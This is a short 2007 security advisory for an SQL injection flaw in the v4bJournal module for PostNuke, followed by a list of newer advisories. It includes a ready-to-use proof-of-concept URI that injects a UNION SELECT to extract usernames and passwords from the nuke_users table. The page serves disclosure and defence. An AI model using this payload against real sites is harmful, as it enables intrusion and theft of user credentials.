exploits , vulnerabilities , articles , PostNuke v4bJournal Module PHP SQL Injection Vulnerability

Title	PostNuke v4bJournal Module PHP SQL Injection Vulnerability
Published	2007-05-02-12:00AM
Updated	2007-05-03-05:29PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Ali Abbasi is credited with the discovery of this vulnerability.
Vulnerable	PostNuke v4bJournal module 0.99
Not Vulnerable
Code	Attackers can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/ **/from/**/nuke_users/**/where/**/pn_uid=2/*
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities
• 2009-12-10 Linux Kernel KVM Large SMP Instruction Local Denial of Service Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Data Injection Remote Code Execution Vulnerability
• 2009-12-09 Adobe Flash Player ActiveX Control Information Disclosure Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Multiple Unspecified Remote Code Execution Vulnerabilities
• 2009-12-09 HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities
• 2009-12-09 Shibboleth Redirection URL HTML Injection Vulnerability
• 2009-12-09 VLC Media Player RTSP Remote Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 13:49:03 +0000